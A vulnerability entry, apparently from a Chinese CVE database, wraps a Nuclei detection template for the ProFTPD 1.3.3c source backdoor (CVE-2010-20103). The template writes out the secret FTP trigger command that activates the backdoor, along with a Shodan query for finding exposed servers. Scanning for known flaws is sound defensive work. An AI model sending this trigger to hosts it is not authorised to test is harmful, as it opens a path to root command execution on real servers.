漏洞描述
ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
CVE-2010-20103: ProFTPd-1.3.3c - Backdoor Command Execution
PoC代码[已公开]
id: CVE-2010-20103
info:
name: ProFTPd-1.3.3c - Backdoor Command Execution
author: pussycat0x
severity: critical
description: |
ProFTPD 1.3.3c contains a command injection backdoor caused by a hidden FTP command trigger in the source tarball, letting remote unauthenticated attackers execute arbitrary shell commands with root privileges.
remediation: |
Update to a version later than 1.3.3c or the latest available version.
reference:
- https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md
- https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/
- https://www.exploit-db.com/exploits/15662
metadata:
max-request: 1
shodan-query: product:\"ProFTPD\"
tags: cve,cve2010,js,network,proftpd,ftp,backdoor,vkev,passive,vuln
javascript:
- pre-condition: |
isPortOpen(Host,Port);
code: |
const data = "HELP ACIDBITCHEZ\r\n";
const c = require("nuclei/net");
let conn = c.Open('tcp', `${Host}:${Port}`);
conn.Send(data);
let resp = conn.RecvString();
Export(resp);
args:
Host: "{{Host}}"
Port: 21
matchers-condition: and
matchers:
- type: dsl
dsl:
- "success == true"
- "contains(response, '220 ProFTPD 1.3.3c')"
condition: and
- type: word
words:
- "contains(response, '502 Unknown command')"
negative: true
# digest: 4b0a00483046022100c13863b0337f0eebece2831d15de8c1cfc7669a3c18d7e5e7e1f205741a3d22c022100b33e76e7eb7b70a21bd8c10ad18043139c5e0890a0d15365e80855e2385af6b2:922c64590222798bb761d5b6d8e72950